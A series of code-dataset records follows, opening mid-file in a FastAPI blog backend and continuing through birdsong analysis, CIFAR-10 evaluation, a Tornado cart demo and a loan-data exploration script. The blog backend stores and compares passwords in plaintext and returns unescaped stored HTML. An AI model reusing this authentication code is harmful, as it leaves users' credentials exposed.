nickname=item.nickname, password=item.password)\n uid = db.get(\"user\", username=item.username).id\n sessionId = session.newSessionId()\n session.setSession(sessionId, {\"userId\": uid})\n response = JSONResponse(content={\"message\": \"success\"})\n response.set_cookie(key=\"sessionId\", value=sessionId)\n return response\n\n\nclass postSignInArg(BaseModel):\n username: str\n password: str\n code: str\n\n\n@app.post(\"/user/signIn\")\nasync def postSignInApi(item: postSignInArg, sessionId=Cookie(None)):\n if sessionId and session.getSession(sessionId):\n return {\"message\": \"loginned\"}\n c = codes.get(item.username, None)\n if not c or item.code.lower() != c.lower():\n return {\"message\": \"code wrong\"}\n else:\n codes.pop(item.username)\n v_user = db.filter(\"user\", username=item.username)\n if len(v_user) != 1:\n return {\"message\": \"failed\"}\n user = v_user.first()\n if user.password == item.password:\n response = JSONResponse(content={\"message\": \"success\"})\n pd = r\"{%userId%: \"+str(user.id)+r\"}\"\n ss = db.filter(\"session\", value=pd)\n if len(ss) == 0:\n sessionId = session.newSessionId()\n response.set_cookie(\n key=\"sessionId\", value=sessionId)\n session.setSession(sessionId, {\"userId\": user.id})\n return response\n else:\n sessionId = ss.first().sessionId\n response.set_cookie(\n key=\"sessionId\", value=sessionId)\n return response\n\n else:\n return {\"message\": \"failed\"}\n\n\n@app.post(\"/user/signOut\")\nasync def postSignOutApi(sessionId=Cookie(None)):\n s = session.getSession(sessionId)\n if s:\n session.removeSession(sessionId)\n response = JSONResponse(content={\"message\": \"success\"})\n response.delete_cookie(key=\"sessionId\")\n return response\n\n\nclass putChangeQmArg(BaseModel):\n qm: str\n\n\n@app.put(\"/user/changeQm\")\nasync def putChangeQmApi(item: putChangeQmArg, sessionId=Cookie(None)):\n s = session.getSession(sessionId)\n if s:\n uid = s['userId']\n else:\n return {\"message\": \"no signIn\"}\n user = db.filter(\"user\", id=uid)\n if len(user) == 1:\n user = user[0]\n else:\n return {\"message\": \"the id is wrong\"}\n user.qm = item.qm\n user.save()\n return {\"message\": \"success\"}\n\n\nclass putChangePasswordArg(BaseModel):\n oldPassword: str\n newPassword: str\n\n\n@app.put(\"/user/changePassword\")\nasync def putChangePasswordApi(item: putChangePasswordArg, sessionId=Cookie(None)):\n s = session.getSession(sessionId)\n if s:\n uid = s[\"userId\"]\n else:\n return {\"message\": \"no signIn\"}\n v_user = db.filter(\"user\", id=uid)\n if len(v_user) != 1:\n return {\"message\": \"the id is wrong\"}\n user = v_user[0]\n if user.password == item.oldPassword:\n user.password = item.newPassword\n user.save()\n return {\"message\": \"success\"}\n else:\n return {\"message\": \"the password is wrong\"}\n\n\n@app.get(\"/page/home\")\nasync def getHomeDataApi(num: int):\n blogs = db.filterNum(\"blog\", \"goodNum\", reverse=True, num=num)\n datas = datasToArr(blogs)\n texts = []\n textDatas = db.filter(\"news\")\n for i in textDatas:\n texts.append(i.text)\n data = {\n \"message\": \"success\",\n \"sortItems\": sortItems,\n \"newBlogs\": datas,\n \"texts\": texts\n }\n return data\n\n\n@app.get(\"/page/tag\")\nasync def getTagDataApi(tagName: str):\n if tagName not in sortItems:\n return {\"message\": \"none\"}\n blogs = db.filter(\"blog\", tag=sortItems.index(tagName))\n datas = datasToArr(blogs)\n return {\n \"message\": \"success\",\n \"blogs\": datas\n }\n\n\n@app.get(\"/page/user\")\nasync def getUserDataApi(id: int = None, 
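Nearly every handler in this FastAPI blog backend repeats the same preamble: read the sessionId cookie, call session.getSession, and bail out with a "no signIn" dict. A dependency can factor that out; a sketch assuming the module's own session helper, with a 401 standing in for the ad-hoc message dicts:

from fastapi import Cookie, Depends, FastAPI, HTTPException

import session  # the local helper module this backend already uses

def current_user_id(sessionId: str = Cookie(None)) -> int:
    s = session.getSession(sessionId)
    if not s:
        raise HTTPException(status_code=401, detail="no signIn")
    return s["userId"]

demo = FastAPI()  # illustrative app, separate from the module's `app`

@demo.post("/blog/new")
async def post_new_blog(user_id: int = Depends(current_user_id)):
    return {"message": "success", "user": user_id}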
sessionId=Cookie(None)):\n    if not id:\n        s = session.getSession(sessionId)\n        if s:\n            id = s[\"userId\"]\n        else:\n            return {\"message\": \"no signIn\"}\n    user = db.filter(\"user\", id=id)\n\n    if len(user) != 0:\n        user = user[0]\n        blogs = db.filter(\"blog\", user=user.id)\n        blogsData = datasToArr(blogs)\n        return {\n            \"userInfo\": {\n                \"username\": user.username,\n                \"nickname\": user.nickname,\n                \"id\": user.id,\n                \"qm\": user.qm,\n                \"exp\": user.exp,\n                \"k\": user.k\n            },\n            \"blogs\": blogsData,\n            \"message\": \"success\"\n        }\n    else:\n        return {\"message\": \"the id or username is wrong\"}\n\n\n@app.get(\"/page/blog\")\nasync def getBlogDataApi(id: int):\n    v_blog = db.filter(\"blog\", id=id)\n    if len(v_blog) != 1:\n        return {\"message\": \"the id is wrong\"}\n    blog = v_blog[0]\n    d_pl = db.filter(\"pl\", blogId=blog.id)\n    pls = []\n    for dp in d_pl:\n        pls.append({\n            \"user\": db.get(\"user\", id=dp.userId).nickname,\n            \"date\": dp.date,\n            \"inner\": dp.inner,\n            \"goodNum\": len(db.filter(\"good\", plId=dp.id)),\n            \"id\":dp.id\n        })\n    pls.reverse()\n\n    # extensions = [\n    #     'markdown.extensions.extra',\n    #     'markdown.extensions.codehilite',\n    #     'markdown.extensions.toc',\n    #     'markdown.extensions.tables'\n    # ]\n    \n    # blogInner=list(blog.inner)\n    # codeTag=0\n    # i=0\n    # while i<len(blogInner):\n    #         if len(blogInner)-i>=3 and blogInner[i]==blogInner[i+1]==blogInner[i+2]==\"`\":\n    #             codeTag+=1\n    #             i+=3\n    #             continue\n    #         elif blogInner[i]==\"\\n\":\n    #             if codeTag%2==0 and (i>len(blogInner)-3 or blogInner[i+2]!=\"\\n\") and (i<3 or blogInner[i-3:i]!=[\"`\",\"`\",\"`\"]):\n    #                 blogInner[i:i+1]=list(\"<br>
\\n\")\n    #             i+=5\n    #             continue\n    #     i+=1\n\n\n    # blogInner=\"\".join(blogInner)\n    # inner = markdown.markdown(blogInner, extensions=extensions)\n    inner=blog.htmlInner\n    return {\n        \"message\": \"success\",\n        \"pls\": pls,\n        \"blog\": {\n            \"title\": blog.title,\n            \"inner\": inner,\n            \"id\": blog.id,\n            \"user\": db.get(\"user\", id=blog.user).nickname,\n            \"date\": blog.date,\n            \"tag\": sortItems[blog.tag],\n            \"good\":blog.goodNum\n        }\n    }\n\n\n@app.get(\"/code\")\nasync def getCodeApi(username: str, method: str = \"signIn\"):\n    if method == \"signIn\" and len(db.filter(\"user\", username=username)) == 0:\n        return {\"message\": \"username wrong\"}\n    global codes\n    code, imgD = confirmCode.get()\n    codes[username] = code.replace(\" \", \"\")\n\n    def delCode():\n        time.sleep(60)\n        if codes.get(username):\n            del codes[username]\n    t = threading.Thread(target=delCode)\n    t.start()\n    return imgD\n\n\n@app.get(\"/edit/blog\")\nasync def getEditBlogApi(title: str, sessionId=Cookie(None)):\n    s = session.getSession(sessionId)\n    if s:\n        user = db.get(\"user\", id=s[\"userId\"])\n    else:\n        return {\"message\": \"no signIn\"}\n    blogs = db.filter(\"blog\", title=title, user=user.id)\n    if len(blogs) == 1:\n        blog = blogs[0]\n        return {\n            \"title\": blog.title,\n            \"inner\": blog.inner,\n            \"id\": blog.id,\n            \"message\": \"success\"\n        }\n    else:\n        return {\"message\": \"none\"}\n\n\n@app.post(\"/edit/del\")\nasync def postDelBlogApi(id:int,sessionId=Cookie(None)):\n    s=session.getSession(sessionId)\n    if s:\n        user=db.get(\"user\",id=s['userId'])\n    else:\n        return {\"message\":\"no signIn\"}\n    blogs=db.filter(\"blog\",id=id,user=user.id)\n    if len(blogs)==1:\n        blog=blogs[0]\n        blog.delete()\n        return {\"message\":\"success\"}\n    else:\n        return {\"message\":\"none\"}\n\n@app.post(\"/edit/uploadImg\")\nasync def postUploadImgApi(sessionId=Cookie(None), img: UploadFile = File(None)):\n    s = session.getSession(sessionId)\n    if s:\n        user = db.get(\"user\", id=s['userId'])\n    else:\n        return {\"message\": \"no signIn\"}\n    data = img.file.read()\n    imgId = db.create(\"files\", file=database.sqlite3.Binary(\n        data), userId=user.id).id\n    url = f\"/api/asset/img/{imgId}\"\n    return {\n        \"message\": \"success\",\n        \"url\": url\n    }\n\n\n@app.post(\"/edit/deleteImg\")\nasync def postDelImgApi(imgId: int, sessionId=Cookie(None)):\n    s = session.getSession(sessionId)\n    if s:\n        user = db.get(\"user\", id=s['userId'])\n    else:\n        return {\"message\": \"no signIn\"}\n    imgs = db.filter(\"files\", id=imgId)\n    if len(imgs) == 1:\n        img = imgs[0]\n        if img.userId != user.id:\n            return {\"message\": \"403\"}\n        db.remove(\"files\", id=imgId)\n        return {\"message\": \"success\"}\n    else:\n        return {\"message\": \"none\"}\n\n\n@app.get(\"/asset/img/{imgId}\")\nasync def getImgApi(imgId: int):\n    img = db.get(\"files\", id=imgId)\n    imgD = img.file\n    buffer = io.BytesIO(imgD)\n    r = StreamingResponse(buffer)\n    return r\n\n\nif __name__ == \"__main__\":\n    uvicorn.run(app)","sub_path":"backProject/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":13798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"456371700","text":"import json\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom os.path import basename, join\nimport pandas\nimport pickle\nfrom scipy.io import wavfile\nimport sys\nimport warnings\n\nimport birdsonganalysis as bsa\nimport utils\n\nsys.path.append('../model/')\nfrom measures import bsa_measure, normalize_and_center\n\ndef get_run_param_and_songlog(path):\n    with open(join(path, 'conf.json'), 'r') as f:\n        run_param = json.load(f)\n\n    try:\n        with open(join(path, 'data.pkl'), 'rb') as 
f:\n songlog = pickle.load(f)\n except FileNotFoundError:\n try:\n warnings.warn('Learning not over')\n with open(join(path, 'data_cur.pkl'), 'rb') as f:\n songlog = pickle.load(f)\n except FileNotFoundError:\n print(\"Error: no data files\")\n \n return run_param, songlog\n\ndef get_rd_best_smodel_and_score(songlog):\n root_data = [item[1] for item in songlog if item[0] == 'root']\n rd = pandas.DataFrame(root_data)\n best = np.argmin(rd['scores'].iloc[-1])\n smodel = rd['songs'].iloc[-1][best]\n score = rd['scores'].iloc[-1][best]\n return rd, smodel, score\n\ndef get_features(song, param_feat):\n song_feat = bsa.all_song_features(song,\n bsa.SR,\n freq_range=bsa.FREQ_RANGE,\n fft_step=bsa.FFT_STEP,\n fft_size=bsa.FFT_SIZE)\n return bsa.rescaling_with_tutor_values(param_feat, song_feat)\n\ndef generate_data_struct(l_path):\n sim = []\n for path in l_path:\n d = {}\n d[\"fft_step\"] = bsa.FFT_STEP\n d[\"freq_range\"] = bsa.FREQ_RANGE\n d[\"fft_size\"] = bsa.FFT_SIZE\n d[\"sr\"], d[\"tutor\"] = wavfile.read(join(path, 'tutor.wav'))\n d[\"tspec\"] = bsa.spectral_derivs(d[\"tutor\"],\n d[\"freq_range\"],\n d[\"fft_step\"],\n d[\"fft_size\"])\n d[\"run_param\"], d[\"songlog\"] = get_run_param_and_songlog(path)\n rd, smodel, score = get_rd_best_smodel_and_score(d[\"songlog\"])\n d[\"rd\"] = rd\n d[\"smodel\"] = smodel\n d[\"score\"] = score\n d[\"song\"] = smodel.gen_sound()\n d[\"starts\"] = []\n for i, gesture in enumerate(d[\"smodel\"].gestures):\n d[\"starts\"].append(gesture[0])\n d[\"smspec\"] = bsa.spectral_derivs(d[\"song\"],\n d[\"freq_range\"],\n d[\"fft_step\"],\n d[\"fft_size\"])\n song_name = basename(d[\"run_param\"]['tutor']).split('.')[0]\n synth_ab = np.loadtxt('../data/{}_ab.dat'.format(song_name))\n d[\"ab\"] = d[\"smodel\"].gen_alphabeta()\n for start, g in d[\"smodel\"].gestures:\n d[\"ab\"][start] = np.nan\n d[\"synth_ab\"] = synth_ab\n nct = normalize_and_center(d[\"tutor\"])\n param_feat= bsa.all_song_features(nct, d[\"sr\"],\n freq_range=d[\"freq_range\"],\n fft_step=d[\"fft_step\"],\n fft_size=d[\"fft_size\"])\n d[\"tfeat\"] = get_features(d[\"tutor\"], param_feat)\n d[\"smfeat\"] = get_features(d[\"song\"], param_feat)\n tmp = '../data/{}_out.wav'\n sr, d[\"synth\"] = wavfile.read(tmp.format(song_name))\n d[\"Boari_score\"] = utils.boari_synth_song_error(d[\"tutor\"],\n d[\"synth\"],\n d[\"run_param\"]['coefs'],\n tutor_feat=param_feat)\n d[\"mtutor\"] = bsa_measure(d[\"tutor\"], d[\"sr\"],\n coefs=d[\"run_param\"]['coefs'],\n tutor_feat=param_feat)\n d[\"msynth\"] = bsa_measure(d[\"synth\"], d[\"sr\"],\n coefs=d[\"run_param\"]['coefs'],\n tutor_feat=param_feat)\n d[\"msong\"] = bsa_measure(d[\"song\"], d[\"sr\"],\n coefs=d[\"run_param\"]['coefs'],\n tutor_feat=param_feat)\n sim.append(d)\n return sim\n\ndef plot_gesture_starts(starts, scale=1, color=\"k\"):\n for start in starts:\n plt.axvline(start / scale, color=color, linewidth=1, alpha=0.2)\n\ndef plot_fig(sim, sims, titles):\n fnames = [\"fm\", \"am\", \"entropy\", \"goodness\", \"amplitude\", \"pitch\", \"rms\"]\n nb_row = 8 + len(fnames)\n nb_col = len(sim)\n color_song = \"C1\"\n color_synth = \"C2\"\n zoom = bsa.FFT_SIZE / bsa.FREQ_RANGE / 4\n \n plt.figure(figsize=(16, nb_row * 5))\n for i in range(nb_col):\n pos = 1 + i\n \n plt.subplot(nb_row, nb_col, pos)\n plt.plot(sim[i][\"tutor\"])\n plt.xlim(0, len(sim[i][\"tutor\"]))\n plt.title(sims[i]+\"\\n\"+titles[i]+\"\\n\\n\"+\"Tutor sound\")\n pos += nb_col\n \n plt.subplot(nb_row, nb_col, pos)\n plt.plot(sim[i][\"song\"], color=color_song)\n 
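# Overlay a faint vertical line at each gesture onset; d[\"starts\"] holds the\n        # sample index of every gesture in the song model (collected in\n        # generate_data_struct above).\n        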
plot_gesture_starts(sim[i][\"starts\"])\n plt.xlim(0, len(sim[i][\"song\"]))\n plt.title(\"Song model sound\")\n pos += nb_col\n \n ax = plt.subplot(nb_row, nb_col, pos)\n bsa.spectral_derivs_plot(sim[i][\"tspec\"], contrast=0.01, ax=ax)\n ax.set_ylim(0, bsa.FREQ_RANGE * zoom)\n ax.set_title(\"Tutor spectral derivative\")\n pos += nb_col\n \n ax = plt.subplot(nb_row, nb_col, pos)\n bsa.spectral_derivs_plot(sim[i][\"smspec\"], contrast=0.01, ax=ax)\n ax.set_ylim(0, bsa.FREQ_RANGE * zoom)\n plot_gesture_starts(sim[i][\"starts\"], scale=sim[i][\"fft_step\"])\n ax.set_title(\"Song spectral derivative\")\n pos += nb_col\n \n ax = plt.subplot(nb_row, nb_col, pos)\n ax = utils.draw_learning_curve(sim[i][\"rd\"], ax=ax)\n ax.axhline(y=-1 * sim[i][\"Boari_score\"], color=\"C3\",\n linestyle='-', label=\"Boari's error\")\n ax.legend()\n pos += nb_col\n \n for fname in fnames:\n plt.subplot(nb_row, nb_col, pos)\n plt.plot(sim[i][\"tfeat\"][fname], label=\"tutor\")\n plt.plot(sim[i][\"smfeat\"][fname], label=\"song\")\n plot_gesture_starts(sim[i][\"starts\"], scale=sim[i][\"fft_step\"])\n plt.xlim(0,len(sim[i][\"tfeat\"][fname]))\n plt.legend()\n plt.title(fname)\n pos += nb_col\n \n plt.subplot(nb_row, nb_col, pos)\n plt.plot(sim[i][\"synth_ab\"][:, 1], label=\"synth\",color=color_synth)\n plt.plot(sim[i][\"ab\"][:, 1], label=\"song\", color=color_song)\n plot_gesture_starts(sim[i][\"starts\"])\n plt.xlim(0,len(sim[i][\"ab\"][:, 1]))\n plt.legend()\n plt.title(\"Beta\")\n pos += nb_col\n \n # Normalization of alpha values for better comparison\n# num = sim[i][\"synth_ab\"][:, 0] - np.min(sim[i][\"synth_ab\"][:, 0])\n# min_v = np.min(sim[i][\"synth_ab\"][:, 0])\n# max_v = np.max(sim[i][\"synth_ab\"][:, 0])\n# denum = max_v - min_v\n# a_synth = num / denum\n# num = sim[i][\"ab\"][:,0] - np.nanmin(sim[i][\"ab\"][:,0])\n# denum = np.nanmax(sim[i][\"ab\"][:,0]) - np.nanmin(sim[i][\"ab\"][:,0])\n# a_sm = num / denum\n\n a_synth = sim[i][\"synth_ab\"][:, 0]\n a_sm = sim[i][\"ab\"][:,0]\n\n # Inversion of the plot order for better readability\n ax = plt.subplot(nb_row, nb_col, pos)\n line1, = plt.plot(a_sm, label=\"song\", color=color_song)\n line2, = plt.plot(a_synth, label=\"synth\", color=color_synth)\n plot_gesture_starts(sim[i][\"starts\"])\n plt.xlim(0, len(a_sm))\n ax.legend((line2, line1), (\"synth\", \"song\"))\n# plt.title(\"Alpha (normalized)\")\n plt.title(\"Alpha\")\n pos += nb_col\n \n # Calculation of each feature error\n amp, th = utils.carac_to_calculate_err_of_synth(sim[i][\"synth\"],\n t_amp=sim[i][\"tfeat\"][\"amplitude\"])\n err_feat_vect = utils.err_per_feat(sim[i][\"mtutor\"],\n sim[i][\"msong\"])\n err_feat_vect_synth = utils.err_per_feat(sim[i][\"mtutor\"][amp > th],\n sim[i][\"msynth\"][amp > th])\n x = np.arange(0,len(err_feat_vect))\n ax = plt.subplot(nb_row, nb_col, pos)\n synth_score = round(sim[i][\"Boari_score\"], 2)\n song_score = round(sim[i][\"score\"], 2)\n synth_label = \"synth ({})\".format(synth_score)\n song_label = \"song ({})\".format(song_score)\n plt.bar(x - 0.1, err_feat_vect_synth,\n width=0.2, align='center', label=synth_label, color=color_synth)\n plt.bar(x + 0.1, err_feat_vect,\n width=0.2, align='center', label=song_label, color=color_song)\n plt.xticks(x, fnames)\n shift = np.max(np.concatenate((err_feat_vect_synth, err_feat_vect))) / 100\n for index in x:\n v_synth = err_feat_vect_synth[index]\n v_song = err_feat_vect[index]\n ax.text(index - 0.1, v_synth + shift,\n str(round(v_synth, 2)),\n color=color_synth, ha=\"center\", fontweight='bold')\n 
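# Print the rounded error value just above each bar; 'shift' lifts the label\n            # by 1% of the tallest bar so the text clears the bar top.\n            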
ax.text(index + 0.1, v_song + shift,\n                str(round(v_song, 2)),\n                color=color_song, ha=\"center\", fontweight='bold')\n        plt.legend()\n        plt.title(\"Errors\")\n\n    plt.show()\n","sub_path":"analysis/cmp_2_sim.py","file_name":"cmp_2_sim.py","file_ext":"py","file_size_in_byte":9447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"563821368","text":"\nimport tensorflow as tf\nimport cifar10_data\nimport cifar10_model\nimport numpy as np\nfrom datetime import datetime\nimport time\n\n# Get testing images and labels for CIFAR-10.\n# inputs img shape: [batch_size, 24, 24, 3], data type: float32, range: [0, 1]\n# lbl shape: [batch_size,], data type: int32, range: [0, 9]\nimages, labels, data_iter = cifar10_data.inputs(\n    True, './input_data', cifar10_data.EVAL_BATCH_SIZE)\n\n# Build a Graph that computes the logits predictions from the inference model.\nlogits = cifar10_model.inference(images, 1.0, False)\n\n# Calculate predictions.\ntop_k_op = tf.nn.in_top_k(logits, labels, 1)\n\n# Init session\ninit = tf.global_variables_initializer()\nsess = tf.Session()\nsess.run(init)\n\n# Create a saver.\n# saver = tf.train.Saver()\n# Restore the moving average version of the learned variables for eval.\nvariable_averages = tf.train.ExponentialMovingAverage(0.9999)\nvariables_to_restore = variable_averages.variables_to_restore()\nsaver = tf.train.Saver(variables_to_restore)\n\n# Get the summary writer.\nsummary_writer = tf.summary.FileWriter(cifar10_data.EVAL_LOG_DIR, sess.graph)\n\nwhile True:\n    ckpt = tf.train.get_checkpoint_state(cifar10_data.CKPT_DIR)\n    if ckpt and ckpt.model_checkpoint_path:\n        # Restores from checkpoint\n        saver.restore(sess, ckpt.model_checkpoint_path)\n        # Assuming model_checkpoint_path looks something like:\n        #   /my-favorite-path/cifar10_train/model.ckpt-0.xxx,\n        # extract global_step from it.\n        global_step = int(ckpt.model_checkpoint_path.split('/')[-1].split('-')[-1].split('.')[0])\n    else:\n        print('No checkpoint file found')\n        time.sleep(200)\n        continue\n\n    # Re-initialize dataset iterator\n    sess.run(data_iter.initializer)\n\n    true_count = 0 # Counts the number of correct predictions.\n    total_sample_count = 0\n    while True:\n        try:\n            predictions = sess.run(top_k_op)\n            true_count += np.sum(predictions)\n            total_sample_count += cifar10_data.EVAL_BATCH_SIZE\n        except tf.errors.OutOfRangeError:\n            break\n\n    # Compute precision @ 1.\n    precision = true_count / total_sample_count\n    print('%s: precision @ %d = %.3f' % (datetime.now(), global_step, precision))\n    summary = tf.Summary()\n    summary.value.add(tag='Precision @ 1', simple_value=precision)\n    summary_writer.add_summary(summary, global_step)\n\n    if global_step >= cifar10_data.MAX_TRAIN_STEPS - 1:\n        break\n    time.sleep(200)\n\nsummary_writer.close()\nsess.close()\n","sub_path":"cifar10_v2/cifar10_eval.py","file_name":"cifar10_eval.py","file_ext":"py","file_size_in_byte":2516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"72665664","text":"#!/usr/bin/env python\n#-*- coding: utf-8 -*-\n\n#/cart/ ajax add & remove\n#/cart/status/ long-polling api\n#/ home page display\n\nimport tornado.web\nimport tornado.ioloop\nimport tornado.options\nimport tornado.httpserver\nimport uuid\nfrom tornado.options import define,options\ndefine('port',8000,help='port to listen on',type=int)\n\nclass ShopCart(object):\n    Inventory=10\n    callbacks=[]\n    carts={}\n    def register(self,callback):\n        self.callbacks.append(callback)\n\n    def addCart(self,session):\n        if session in self.carts:\n            return\n        
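# First add for this session: record it and wake every pending long-poll\n        # callback so all clients see the updated inventory count.\n        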
self.carts[session]=True\n self.notifyAll()\n\n def removeCart(self,session):\n if session not in self.carts:\n return\n del self.carts[session]\n self.notifyAll()\n\n def getInventory(self):\n return self.Inventory-len(self.carts)\n\n def notifyAll(self):\n for cb in self.callbacks:\n cb(self.getInventory())\n self.callbacks=[]\n\n\nclass Application(tornado.web.Application):\n def __init__(self):\n self.shopCart=ShopCart()\n handlers=[\n (r'/',IndexHandler),\n (r'/cart/',CartHandler),\n (r'/cart/status/',StatusHandler)\n ]\n settings=dict(\n template_path='templates',\n static_path='static',\n debug=True\n )\n tornado.web.Application.__init__(self,handlers=handlers,**settings)\n\n\nclass IndexHandler(tornado.web.RequestHandler):\n def get(self, *args, **kwargs):\n session=uuid.uuid4()\n count=self.application.shopCart.getInventory()\n self.render('cart.html',count=count,session=session)\n\nclass CartHandler(tornado.web.RequestHandler):\n def post(self, *args, **kwargs):\n session=self.get_argument('session')\n action=self.get_argument('action')\n if not session:\n self.set_status(400)\n return\n\n if action=='add':\n self.application.shopCart.addCart(session)\n elif action=='remove':\n self.application.shopCart.removeCart(session)\n else:\n self.set_status(400)\n\nclass StatusHandler(tornado.web.RequestHandler):\n @tornado.web.asynchronous\n def get(self):\n self.application.shopCart.register(self.on_message)\n\n def on_message(self,count):\n self.set_header(\"Content-Type\", \"application/json\")\n self.write('{\"inventoryCount\":\"%d\"}'%count)\n self.finish()\n\nhttp_server=tornado.httpserver.HTTPServer(Application())\nhttp_server.listen(options.port)\ntornado.ioloop.IOLoop.instance().start()","sub_path":"cart/cart.py","file_name":"cart.py","file_ext":"py","file_size_in_byte":2557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"158737667","text":"import pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport sklearn\r\nimport seaborn as sns\r\n\r\n\r\nbureau_balance = pd.read_csv('bureau_balance.csv')\r\napplication_train = pd.read_csv('application_train.csv')\r\nbureau = pd.read_csv('bureau.csv')\r\ncredit_bal = pd.read_csv(\"credit_card_balance.csv\")\r\ninstal_payment = pd.read_csv(\"installments_payments.csv\")\r\nPOS_CASH_balance = pd.read_csv(\"POS_CASH_balance.csv\")\r\nprev_app = pd.read_csv(\"previous_application.csv\")\r\napplication_test = pd.read_csv('application_test.csv')\r\n\r\n\r\n# Training and Testing data features\r\nprint('Training data shape: ', application_train.shape)\r\nprint('Testing data shape: ', application_test.shape)\r\napplication_train['TARGET'].value_counts()\r\n\r\n# Function to calculate missing values by column# Funct \r\ndef missing_values_table(df):\r\n # Total missing values\r\n mis_val = df.isnull().sum()\r\n \r\n # Percentage of missing values\r\n mis_val_percent = 100 * df.isnull().sum() / len(df)\r\n \r\n # Make a table with the results\r\n mis_val_table = pd.concat([mis_val, mis_val_percent], axis=1)\r\n \r\n # Rename the columns\r\n mis_val_table_ren_columns = mis_val_table.rename(\r\n columns = {0 : 'Missing Values', 1 : '% of Total Values'})\r\n \r\n # Sort the table by percentage of missing descending\r\n mis_val_table_ren_columns = mis_val_table_ren_columns[\r\n mis_val_table_ren_columns.iloc[:,1] != 0].sort_values(\r\n '% of Total Values', ascending=False).round(1)\r\n \r\n # Print some summary information\r\n print (\"Your selected dataframe has \" + 
str(df.shape[1]) + \" columns.\\n\" \r\n \"There are \" + str(mis_val_table_ren_columns.shape[0]) +\r\n \" columns that have missing values.\")\r\n \r\n # Return the dataframe with missing information\r\n return mis_val_table_ren_columns\r\n# Missing values statistics\r\nmissing_values = missing_values_table(application_train)\r\nmissing_values.head(20)\r\n\r\n# Number of unique classes in each object column (categorical)\r\n#application_train.dtypes.value_counts()\r\n\r\napplication_train.select_dtypes(include=['object']).apply(pd.Series.nunique, axis = 0)\r\n\r\n# Create a label encoder object\r\nfrom sklearn.preprocessing import LabelEncoder\r\n\r\nle = LabelEncoder()\r\nle_count = 0\r\n# Iterate through the columns\r\nfor col in application_train:\r\n if application_train[col].dtype == 'object':\r\n # If 2 or fewer unique categories\r\n if len(list(application_train[col].unique())) <= 2:\r\n # Train on the training data\r\n le.fit(application_train[col])\r\n # Transform both training and testing data\r\n application_train[col] = le.transform(application_train[col])\r\n application_test[col] = le.transform(application_test[col])\r\n \r\n # Keep track of how many columns were label encoded\r\n le_count += 1\r\n \r\nprint('%d columns were label encoded.' % le_count)\r\n\r\n\r\n# one-hot encoding of categorical variables\r\napplication_train = pd.get_dummies(application_train)\r\napplication_test = pd.get_dummies(application_test)\r\n\r\nprint('Training Features shape: ', application_train.shape)\r\nprint('Testing Features shape: ', application_test.shape)\r\n\r\ntrain_labels = application_train['TARGET']\r\n\r\n# Align the training and testing data, keep only columns present in both dataframes\r\napplication_train, application_test = application_train.align(application_test, join = 'inner', axis = 1)\r\n\r\n# Add the target back in\r\napplication_train['TARGET'] = train_labels\r\n\r\nprint('Training Features shape: ', application_train.shape)\r\nprint('Testing Features shape: ', application_test.shape)\r\n\r\n\r\n(application_train['DAYS_BIRTH'] / -365).describe()\r\n\r\napplication_train['DAYS_EMPLOYED'].describe()\r\n\r\nplt.hist(application_train['DAYS_EMPLOYED'])\r\n#application_train['DAYS_EMPLOYED'].astype(int).plot.hist();\r\n#(title = 'Days Employment Histogram')\r\nplt.xlabel('Days Employment')\r\n\r\nanom = application_train[application_train['DAYS_EMPLOYED'] == 365243]\r\nnon_anom = application_train[application_train['DAYS_EMPLOYED'] != 365243]\r\nprint('The non-anomalies default on %0.2f%% of loans' % (100 * non_anom['TARGET'].mean()))\r\nprint('The anomalies default on %0.2f%% of loans' % (100 * anom['TARGET'].mean()))\r\nprint('There are %d anomalous days of employment' % len(anom))\r\n\r\n\r\n# Create an anomalous flag column\r\napplication_train['DAYS_EMPLOYED_ANOM'] = application_train[\"DAYS_EMPLOYED\"] == 365243\r\n\r\n# Replace the anomalous values with nan\r\napplication_train['DAYS_EMPLOYED'].replace({365243: np.nan}, inplace = True)\r\n\r\napplication_train['DAYS_EMPLOYED'].plot.hist(title = 'Days Employment Histogram');\r\nplt.xlabel('Days Employment');\r\n\r\n\r\napplication_test['DAYS_EMPLOYED_ANOM'] = application_test[\"DAYS_EMPLOYED\"] == 365243\r\napplication_test[\"DAYS_EMPLOYED\"].replace({365243: np.nan}, inplace = True)\r\n\r\nprint('There are %d anomalies in the test data out of %d entries' % (application_test[\"DAYS_EMPLOYED_ANOM\"].sum(), len(application_test)))\r\n\r\n\r\n# Find correlations with the target and sort\r\ncorrelations = 
application_train.corr()['TARGET'].sort_values()\r\n\r\n# Display correlations\r\nprint('Most Positive Correlations:\\n', correlations.tail(15))\r\nprint('\\nMost Negative Correlations:\\n', correlations.head(15))\r\n\r\n# Find the correlation of the positive days since birth and target\r\napplication_train['DAYS_BIRTH'] = abs(application_train['DAYS_BIRTH'])\r\napplication_train['DAYS_BIRTH'].corr(application_train['TARGET'])\r\n\r\n# Set the style of plots\r\nplt.style.use('fivethirtyeight')\r\n\r\n# Plot the distribution of ages in years\r\nplt.hist(application_train['DAYS_BIRTH'] / 365, edgecolor = 'k', bins = 25)\r\nplt.title('Age of Client'); plt.xlabel('Age (years)'); plt.ylabel('Count');\r\n\r\n\r\nplt.figure(figsize = (10, 8))\r\n\r\n# KDE plot of loans that were repaid on time\r\nsns.kdeplot(application_train.loc[application_train['TARGET'] == 0, 'DAYS_BIRTH'] / 365, label = 'target == 0')\r\n\r\n# KDE plot of loans which were not repaid on time\r\nsns.kdeplot(application_train.loc[application_train['TARGET'] == 1, 'DAYS_BIRTH'] / 365, label = 'target == 1')\r\n\r\n# Labeling of plot\r\nplt.xlabel('Age (years)'); plt.ylabel('Density'); plt.title('Distribution of Ages');\r\n\r\n\r\n# Age information into a separate dataframe\r\nage_data = application_train[['TARGET', 'DAYS_BIRTH']]\r\nage_data['YEARS_BIRTH'] = age_data['DAYS_BIRTH'] / 365\r\n\r\n# Bin the age data\r\nage_data['YEARS_BINNED'] = pd.cut(age_data['YEARS_BIRTH'], bins = np.linspace(20, 70, num = 11))\r\nage_data.head(10)\r\n\r\n\r\n# Group by the bin and calculate averages\r\nage_groups = 